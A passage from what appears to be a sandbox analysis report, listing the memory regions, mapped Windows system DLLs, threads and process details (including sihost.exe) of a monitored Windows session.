"c:\\windows\\system32\\gdi32.dll") Region: id = 5761 start_va = 0x7ffaf6ec0000 end_va = 0x7ffaf6f64fff entry_point = 0x7ffaf6ec0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 5762 start_va = 0x7ffaf70d0000 end_va = 0x7ffaf717cfff entry_point = 0x7ffaf70d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5763 start_va = 0x7ffaf7190000 end_va = 0x7ffaf724dfff entry_point = 0x7ffaf7190000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 5764 start_va = 0x7ffaf72e0000 end_va = 0x7ffaf755bfff entry_point = 0x7ffaf72e0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 5765 start_va = 0x7ffaf75d0000 end_va = 0x7ffaf7675fff entry_point = 0x7ffaf75d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 5766 start_va = 0x7ffaf7860000 end_va = 0x7ffaf78b0fff entry_point = 0x7ffaf7860000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 5767 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6387 start_va = 0xf399250000 end_va = 0xf39934ffff entry_point = 0x0 region_type = private name = "private_0x000000f399250000" filename = "" Region: id = 6388 start_va = 0x7ff7875ea000 end_va = 0x7ff7875ebfff entry_point = 0x0 region_type = private name = "private_0x00007ff7875ea000" filename = "" Thread: id = 586 os_tid = 0xb1c Thread: id = 587 os_tid = 0xa04 Thread: id = 588 os_tid = 0x6c8 Thread: id = 589 os_tid = 0x5e4 Thread: id = 816 os_tid = 0x548 Thread: id = 818 os_tid = 0x8ec Process: id = "53" image_name = "sihost.exe" filename = "c:\\windows\\system32\\sihost.exe" page_root = "0x9e31000" os_pid = "0x7c8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "43" os_parent_pid = "0x318" cmd_line = "sihost.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5461 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5462 start_va = 0x96cef70000 end_va = 0x96cef7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000096cef70000" filename = "" Region: id = 5463 start_va = 0x96cef80000 end_va = 0x96cef86fff entry_point = 0x0 region_type = private name = "private_0x00000096cef80000" filename = "" Region: id = 5464 start_va = 0x96cef90000 end_va = 0x96cefa3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000096cef90000" filename = "" Region: id = 5465 start_va = 0x96cefb0000 end_va = 0x96cf02ffff entry_point = 0x0 region_type = private name = "private_0x00000096cefb0000" filename = "" Region: id = 5466 start_va = 0x96cf030000 end_va = 0x96cf033fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000096cf030000" filename = "" Region: id = 5467 start_va = 0x96cf040000 end_va = 0x96cf041fff entry_point = 0x0 region_type = private name = "private_0x00000096cf040000" filename = "" Region: id = 5468 start_va = 0x96cf050000 end_va = 0x96cf056fff entry_point = 0x0 region_type = private name = "private_0x00000096cf050000" filename = "" Region: id = 5469 start_va = 0x96cf060000 end_va = 0x96cf060fff entry_point = 0x0 region_type = private name = "private_0x00000096cf060000" filename = "" Region: id = 5470 start_va = 0x96cf070000 end_va = 0x96cf070fff entry_point = 0x0 region_type = private name = "private_0x00000096cf070000" filename = "" Region: id = 5471 start_va = 0x96cf080000 end_va = 0x96cf080fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000096cf080000" filename = "" Region: id = 5472 start_va = 0x96cf090000 end_va = 0x96cf18ffff entry_point = 0x0 region_type = private name = "private_0x00000096cf090000" filename = "" Region: id = 5473 start_va = 0x96cf190000 end_va = 0x96cf24dfff entry_point = 0x96cf190000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5474 start_va = 0x96cf2d0000 end_va = 0x96cf2d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000096cf2d0000" filename = "" Region: id = 5475 start_va = 0x96cf2e0000 end_va = 0x96cf35ffff entry_point = 0x0 region_type = private name = "private_0x00000096cf2e0000" filename = "" Region: id = 5476 start_va = 0x96cf360000 end_va = 0x96cf36ffff entry_point = 0x0 region_type = private name = "private_0x00000096cf360000" filename = "" Region: id = 5477 start_va = 0x96cf390000 end_va = 0x96cf39ffff entry_point = 0x0 region_type = private name = "private_0x00000096cf390000" filename = "" Region: id = 5478 start_va = 0x96cf3a0000 end_va = 0x96cf527fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000096cf3a0000" filename = "" Region: id = 5479 start_va = 0x96cf530000 end_va = 0x96cf6b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000096cf530000" filename = "" Region: id = 5480 start_va = 0x96cf6c0000 end_va = 0x96d0abffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000096cf6c0000" filename = "" Region: id = 5481 start_va = 0x96d0ac0000 end_va = 0x96d0bbffff entry_point = 0x0 region_type = private name = "private_0x00000096d0ac0000" filename = "" Region: id = 5482 start_va = 0x96d0bc0000 end_va = 0x96d0ef6fff entry_point = 0x96d0bc0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 5483 start_va = 0x96d0f00000 end_va = 0x96d0f7ffff entry_point = 0x0 region_type = private name = "private_0x00000096d0f00000" filename = "" Region: id = 5484 start_va = 0x96d0f80000 end_va = 0x96d0ffffff entry_point = 0x0 region_type = private name = "private_0x00000096d0f80000" filename = "" Region: id = 5485 start_va = 0x96d1000000 end_va = 0x96d107ffff entry_point = 0x0 region_type = private name = "private_0x00000096d1000000" filename = "" Region: id = 5486 start_va = 0x96d1080000 end_va = 0x96d10fffff entry_point = 0x0 region_type = private name = "private_0x00000096d1080000" filename = "" Region: id = 5487 start_va = 0x96d1100000 end_va = 0x96d117ffff entry_point = 0x0 region_type = private name = "private_0x00000096d1100000" filename = "" Region: id = 5488 start_va = 0x96d1180000 end_va = 0x96d127ffff entry_point = 0x0 region_type = private name = "private_0x00000096d1180000" filename = "" Region: id = 5489 start_va = 0x96d1280000 end_va = 0x96d1a7ffff entry_point = 0x0 region_type = private name = "private_0x00000096d1280000" filename = "" Region: id = 5490 start_va = 0x96d1b00000 end_va = 0x96d1b7ffff entry_point = 0x0 region_type = private name = "private_0x00000096d1b00000" filename = "" Region: id = 5491 start_va = 0x96d1b80000 end_va = 0x96d1bfffff entry_point = 0x0 region_type = private name = "private_0x00000096d1b80000" filename = "" Region: id = 5492 start_va = 0x96d1c00000 end_va = 0x96d1c7ffff entry_point = 0x0 region_type = private name = "private_0x00000096d1c00000" filename = "" Region: id = 5493 start_va = 0x96d1c80000 end_va = 0x96d1d5efff entry_point = 0x96d1c80000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 5494 start_va = 0x96d1d60000 end_va = 0x96d1ddffff entry_point = 0x0 region_type = private name = "private_0x00000096d1d60000" filename = "" Region: id = 5495 start_va = 0x96d1e60000 end_va = 0x96d1e89fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000096d1e60000" filename = "" Region: id = 5496 start_va = 0x96d1f90000 end_va = 0x96d208ffff entry_point = 0x0 region_type = private name = "private_0x00000096d1f90000" filename = "" Region: id = 5497 start_va = 0x7df5ff900000 end_va = 0x7ff5ff8fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff900000" filename = "" Region: id = 5498 start_va = 0x7ff6dbbf2000 end_va = 0x7ff6dbbf3fff entry_point = 0x0 region_type = private name = "private_0x00007ff6dbbf2000" filename = "" Region: id = 5499 start_va = 0x7ff6dbbf4000 end_va = 0x7ff6dbbf5fff entry_point = 0x0 region_type = private name = "private_0x00007ff6dbbf4000" filename = "" Region: id = 5500 start_va = 0x7ff6dbbf6000 end_va = 0x7ff6dbbf7fff entry_point = 0x0 region_type = private name = "private_0x00007ff6dbbf6000" filename = "" Region: id = 5501 start_va = 0x7ff6dbbf8000 end_va = 0x7ff6dbbf9fff entry_point = 0x0 region_type = private name = "private_0x00007ff6dbbf8000" filename = "" Region: id = 5502 start_va = 0x7ff6dbbfc000 end_va = 0x7ff6dbbfdfff entry_point = 0x0 region_type = private name = "private_0x00007ff6dbbfc000" filename = "" Region: id = 5503 start_va = 0x7ff6dbbfe000 end_va = 0x7ff6dbbfffff entry_point = 0x0 region_type = private name = "private_0x00007ff6dbbfe000" filename = "" Region: id = 5504 start_va = 0x7ff6dbc00000 end_va = 0x7ff6dbcfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6dbc00000" filename = "" Region: id = 5505 start_va = 0x7ff6dbd00000 end_va = 0x7ff6dbd22fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6dbd00000" filename = "" Region: id = 5506 start_va = 0x7ff6dbd23000 end_va = 0x7ff6dbd24fff entry_point = 0x0 region_type = private name = "private_0x00007ff6dbd23000" filename = "" Region: id = 5507 start_va = 0x7ff6dbd25000 end_va = 0x7ff6dbd26fff entry_point = 0x0 region_type = private name = "private_0x00007ff6dbd25000" filename = "" Region: id = 5508 start_va = 0x7ff6dbd27000 end_va = 0x7ff6dbd28fff entry_point = 0x0 region_type = private name = "private_0x00007ff6dbd27000" filename = "" Region: id = 5509 start_va = 0x7ff6dbd29000 end_va = 0x7ff6dbd2afff entry_point = 0x0 region_type = private name = "private_0x00007ff6dbd29000" filename = "" Region: id = 5510 start_va = 0x7ff6dbd2d000 end_va = 0x7ff6dbd2efff entry_point = 0x0 region_type = private name = "private_0x00007ff6dbd2d000" filename = "" Region: id = 5511 start_va = 0x7ff6dbd2f000 end_va = 0x7ff6dbd2ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6dbd2f000" filename = "" Region: id = 5512 start_va = 0x7ff6dc800000 end_va = 0x7ff6dc815fff entry_point = 0x7ff6dc800000 region_type = mapped_file name = "sihost.exe" filename = "\\Windows\\System32\\sihost.exe" (normalized: "c:\\windows\\system32\\sihost.exe") Region: id = 5513 start_va = 0x7ffae5d00000 end_va = 0x7ffae5d98fff entry_point = 0x7ffae5d00000 region_type = mapped_file name = "staterepository.core.dll" filename = "\\Windows\\System32\\StateRepository.Core.dll" (normalized: "c:\\windows\\system32\\staterepository.core.dll") Region: id = 5514 start_va = 0x7ffae5da0000 end_va = 0x7ffae6031fff entry_point = 0x7ffae5da0000 region_type = mapped_file name = "windows.staterepository.dll" filename = "\\Windows\\System32\\Windows.StateRepository.dll" (normalized: "c:\\windows\\system32\\windows.staterepository.dll") Region: id = 5515 start_va = 0x7ffae8200000 end_va = 0x7ffae820bfff entry_point = 0x7ffae8200000 region_type = mapped_file name = "licensemanagerapi.dll" filename = "\\Windows\\System32\\LicenseManagerApi.dll" (normalized: "c:\\windows\\system32\\licensemanagerapi.dll") Region: id = 5516 start_va = 0x7ffae8210000 end_va = 0x7ffae841cfff entry_point = 0x7ffae8210000 region_type = mapped_file name = "twinui.appcore.dll" filename = "\\Windows\\System32\\twinui.appcore.dll" (normalized: "c:\\windows\\system32\\twinui.appcore.dll") Region: id = 5517 start_va = 0x7ffae84f0000 end_va = 0x7ffae8504fff entry_point = 0x7ffae84f0000 region_type = mapped_file name = "execmodelproxy.dll" filename = "\\Windows\\System32\\execmodelproxy.dll" (normalized: "c:\\windows\\system32\\execmodelproxy.dll") Region: id = 5518 start_va = 0x7ffae8580000 end_va = 0x7ffae8624fff entry_point = 0x7ffae8580000 region_type = mapped_file name = "sharehost.dll" filename = "\\Windows\\System32\\ShareHost.dll" (normalized: "c:\\windows\\system32\\sharehost.dll") Region: id = 5519 start_va = 0x7ffae8630000 end_va = 0x7ffae8640fff entry_point = 0x7ffae8630000 region_type = mapped_file name = "ondemandbrokerclient.dll" filename = "\\Windows\\System32\\OnDemandBrokerClient.dll" (normalized: "c:\\windows\\system32\\ondemandbrokerclient.dll") Region: id = 5520 start_va = 0x7ffae8650000 end_va = 0x7ffae86fbfff entry_point = 0x7ffae8650000 region_type = mapped_file name = "appcontracts.dll" filename = "\\Windows\\System32\\AppContracts.dll" (normalized: "c:\\windows\\system32\\appcontracts.dll") Region: id = 5521 start_va = 0x7ffae8700000 end_va = 0x7ffae870cfff entry_point = 0x7ffae8700000 region_type = mapped_file name = "notificationplatformcomponent.dll" filename = "\\Windows\\System32\\notificationplatformcomponent.dll" (normalized: "c:\\windows\\system32\\notificationplatformcomponent.dll") Region: id = 5522 start_va = 0x7ffae8710000 end_va = 0x7ffae8752fff entry_point = 0x7ffae8710000 region_type = mapped_file name = "execmodelclient.dll" filename = "\\Windows\\System32\\ExecModelClient.dll" (normalized: "c:\\windows\\system32\\execmodelclient.dll") Region: id = 5523 start_va = 0x7ffae89e0000 end_va = 0x7ffae89e8fff entry_point = 0x7ffae89e0000 region_type = mapped_file name = "wpportinglibrary.dll" filename = "\\Windows\\System32\\WpPortingLibrary.dll" (normalized: "c:\\windows\\system32\\wpportinglibrary.dll") Region: id = 5524 start_va = 0x7ffae89f0000 end_va = 0x7ffae8ac7fff entry_point = 0x7ffae89f0000 region_type = mapped_file name = "modernexecserver.dll" filename = "\\Windows\\System32\\modernexecserver.dll" (normalized: "c:\\windows\\system32\\modernexecserver.dll") Region: id = 5525 start_va = 0x7ffae8ad0000 end_va = 0x7ffae8adbfff entry_point = 0x7ffae8ad0000 region_type = mapped_file name = "dsclient.dll" filename = "\\Windows\\System32\\dsclient.dll" (normalized: "c:\\windows\\system32\\dsclient.dll") Region: id = 5526 start_va = 0x7ffae8ae0000 end_va = 0x7ffae8af0fff entry_point = 0x7ffae8ae0000 region_type = mapped_file name = "userdatatypehelperutil.dll" filename = "\\Windows\\System32\\UserDataTypeHelperUtil.dll" (normalized: "c:\\windows\\system32\\userdatatypehelperutil.dll") Region: id = 5527 start_va = 0x7ffae8b00000 end_va = 0x7ffae8b5dfff entry_point = 0x7ffae8b00000 region_type = mapped_file name = "activationmanager.dll" filename = "\\Windows\\System32\\ActivationManager.dll" (normalized: "c:\\windows\\system32\\activationmanager.dll") Region: id = 5528 start_va = 0x7ffae8b60000 end_va = 0x7ffae8fc9fff entry_point = 0x7ffae8b60000 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 5529 start_va = 0x7ffae8fd0000 end_va = 0x7ffae9230fff entry_point = 0x7ffae8fd0000 region_type = mapped_file name = "coreuicomponents.dll" filename = "\\Windows\\System32\\CoreUIComponents.dll" (normalized: "c:\\windows\\system32\\coreuicomponents.dll") Region: id = 5530 start_va = 0x7ffae9d90000 end_va = 0x7ffae9db1fff entry_point = 0x7ffae9d90000 region_type = mapped_file name = "appointmentactivation.dll" filename = "\\Windows\\System32\\AppointmentActivation.dll" (normalized: "c:\\windows\\system32\\appointmentactivation.dll") Region: id = 5531 start_va = 0x7ffae9dc0000 end_va = 0x7ffae9deefff entry_point = 0x7ffae9dc0000 region_type = mapped_file name = "edputil.dll" filename = "\\Windows\\System32\\edputil.dll" (normalized: "c:\\windows\\system32\\edputil.dll") Region: id = 5532 start_va = 0x7ffae9df0000 end_va = 0x7ffae9e1ffff entry_point = 0x7ffae9df0000 region_type = mapped_file name = "clipboardserver.dll" filename = "\\Windows\\System32\\ClipboardServer.dll" (normalized: "c:\\windows\\system32\\clipboardserver.dll") Region: id = 5533 start_va = 0x7ffae9e20000 end_va = 0x7ffae9e31fff entry_point = 0x7ffae9e20000 region_type = mapped_file name = "windows.shell.servicehostbuilder.dll" filename = "\\Windows\\System32\\Windows.Shell.ServiceHostBuilder.dll" (normalized: "c:\\windows\\system32\\windows.shell.servicehostbuilder.dll") Region: id = 5534 start_va = 0x7ffae9e40000 end_va = 0x7ffae9e56fff entry_point = 0x7ffae9e40000 region_type = mapped_file name = "desktopshellext.dll" filename = "\\Windows\\System32\\DesktopShellExt.dll" (normalized: "c:\\windows\\system32\\desktopshellext.dll") Region: id = 5535 start_va = 0x7ffaedb10000 end_va = 0x7ffaede85fff entry_point = 0x7ffaedb10000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 5536 start_va = 0x7ffaef7b0000 end_va = 0x7ffaef841fff entry_point = 0x7ffaef7b0000 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 5537 start_va = 0x7ffaef850000 end_va = 0x7ffaef888fff entry_point = 0x7ffaef850000 region_type = mapped_file name = "policymanager.dll" filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll") Region: id = 5538 start_va = 0x7ffaef9c0000 end_va = 0x7ffaef9f5fff entry_point = 0x7ffaef9c0000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 5539 start_va = 0x7ffaf0de0000 end_va = 0x7ffaf0f10fff entry_point = 0x7ffaf0de0000 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 5540 start_va = 0x7ffaf0f20000 end_va = 0x7ffaf0f5dfff entry_point = 0x7ffaf0f20000 region_type = mapped_file name = "usermgrproxy.dll" filename = "\\Windows\\System32\\UserMgrProxy.dll" (normalized: "c:\\windows\\system32\\usermgrproxy.dll") Region: id = 5541 start_va = 0x7ffaf1040000 end_va = 0x7ffaf11c2fff entry_point = 0x7ffaf1040000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 5542 start_va = 0x7ffaf11d0000 end_va = 0x7ffaf1241fff entry_point = 0x7ffaf11d0000 region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 5543 start_va = 0x7ffaf13a0000 end_va = 0x7ffaf13affff entry_point = 0x7ffaf13a0000 region_type = mapped_file name = "usermgrcli.dll" filename = "\\Windows\\System32\\usermgrcli.dll" (normalized: "c:\\windows\\system32\\usermgrcli.dll") Region: id = 5544 start_va = 0x7ffaf24b0000 end_va = 0x7ffaf24d1fff entry_point = 0x7ffaf24b0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 5545 start_va = 0x7ffaf2560000 end_va = 0x7ffaf2627fff entry_point = 0x7ffaf2560000 region_type = mapped_file name = "coremessaging.dll" filename = "\\Windows\\System32\\CoreMessaging.dll" (normalized: "c:\\windows\\system32\\coremessaging.dll") Region: id = 5546 start_va = 0x7ffaf2d10000 end_va = 0x7ffaf2da5fff entry_point = 0x7ffaf2d10000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 5547 start_va = 0x7ffaf2db0000 end_va = 0x7ffaf2dd6fff entry_point = 0x7ffaf2db0000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 5548 start_va = 0x7ffaf2ef0000 end_va = 0x7ffaf2fddfff entry_point = 0x7ffaf2ef0000 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\System32\\twinapi.appcore.dll" (normalized: "c:\\windows\\system32\\twinapi.appcore.dll") Region: id = 5549 start_va = 0x7ffaf3070000 end_va = 0x7ffaf3097fff entry_point = 0x7ffaf3070000 region_type = mapped_file name = "rmclient.dll" filename = "\\Windows\\System32\\rmclient.dll" (normalized: "c:\\windows\\system32\\rmclient.dll") Region: id = 5550 start_va = 0x7ffaf36f0000 end_va = 0x7ffaf36fbfff entry_point = 0x7ffaf36f0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 5551 start_va = 0x7ffaf37e0000 end_va = 0x7ffaf3811fff entry_point = 0x7ffaf37e0000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 5552 start_va = 0x7ffaf3960000 end_va = 0x7ffaf3992fff entry_point = 0x7ffaf3960000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 5553 start_va = 0x7ffaf3a50000 end_va = 0x7ffaf3a6efff entry_point = 0x7ffaf3a50000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 5554 start_va = 0x7ffaf3d00000 end_va = 0x7ffaf3d16fff entry_point = 0x7ffaf3d00000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 5555 start_va = 0x7ffaf41b0000 end_va = 0x7ffaf41dbfff entry_point = 0x7ffaf41b0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 5556 start_va = 0x7ffaf41e0000 end_va = 0x7ffaf41eafff entry_point = 0x7ffaf41e0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 5557 start_va = 0x7ffaf4260000 end_va = 0x7ffaf4287fff entry_point = 0x7ffaf4260000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 5558 start_va = 0x7ffaf4290000 end_va = 0x7ffaf42fafff entry_point = 0x7ffaf4290000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 5559 start_va = 0x7ffaf4440000 end_va = 0x7ffaf4489fff entry_point = 0x7ffaf4440000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 5560 start_va = 0x7ffaf4490000 end_va = 0x7ffaf44a2fff entry_point = 0x7ffaf4490000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 5561 start_va = 0x7ffaf44b0000 end_va = 0x7ffaf44c0fff entry_point = 0x7ffaf44b0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 5562 start_va = 0x7ffaf44d0000 end_va = 0x7ffaf44defff entry_point = 0x7ffaf44d0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 5563 start_va = 0x7ffaf4540000 end_va = 0x7ffaf4583fff entry_point = 0x7ffaf4540000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 5564 start_va = 0x7ffaf4590000 end_va = 0x7ffaf4bb7fff entry_point = 0x7ffaf4590000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 5565 start_va = 0x7ffaf4bc0000 end_va = 0x7ffaf4c72fff entry_point = 0x7ffaf4bc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 5566 start_va = 0x7ffaf4c80000 end_va = 0x7ffaf4e40fff entry_point = 0x7ffaf4c80000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 5567 start_va = 0x7ffaf4e50000 end_va = 0x7ffaf502cfff entry_point = 0x7ffaf4e50000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 5568 start_va = 0x7ffaf5140000 end_va = 0x7ffaf528dfff entry_point = 0x7ffaf5140000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 5569 start_va = 0x7ffaf5290000 end_va = 0x7ffaf53b5fff entry_point = 0x7ffaf5290000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5570 start_va = 0x7ffaf53c0000 end_va = 0x7ffaf53f5fff entry_point = 0x7ffaf53c0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 5571 start_va = 0x7ffaf55b0000 end_va = 0x7ffaf56f0fff entry_point = 0x7ffaf55b0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 5572 start_va = 0x7ffaf5700000 end_va = 0x7ffaf579cfff entry_point = 0x7ffaf5700000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5573 start_va = 0x7ffaf57a0000 end_va = 0x7ffaf57fafff entry_point = 0x7ffaf57a0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5574 start_va = 0x7ffaf5800000 end_va = 0x7ffaf5984fff entry_point = 0x7ffaf5800000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 5575 start_va = 0x7ffaf6ec0000 end_va = 0x7ffaf6f64fff entry_point = 0x7ffaf6ec0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 5576 start_va = 0x7ffaf6f70000 end_va = 0x7ffaf70cbfff entry_point = 0x7ffaf6f70000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 5577 start_va = 0x7ffaf70d0000 end_va = 0x7ffaf717cfff entry_point = 0x7ffaf70d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5578 start_va = 0x7ffaf7190000 end_va = 0x7ffaf724dfff entry_point = 0x7ffaf7190000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 5579 start_va = 0x7ffaf72e0000 end_va = 0x7ffaf755bfff entry_point = 0x7ffaf72e0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 5580 start_va = 0x7ffaf75d0000 end_va = 0x7ffaf7675fff entry_point = 0x7ffaf75d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 5581 start_va = 0x7ffaf7860000 end_va = 0x7ffaf78b0fff entry_point = 0x7ffaf7860000 region_type = mapped_file name = "shlwapi.dll" filename = 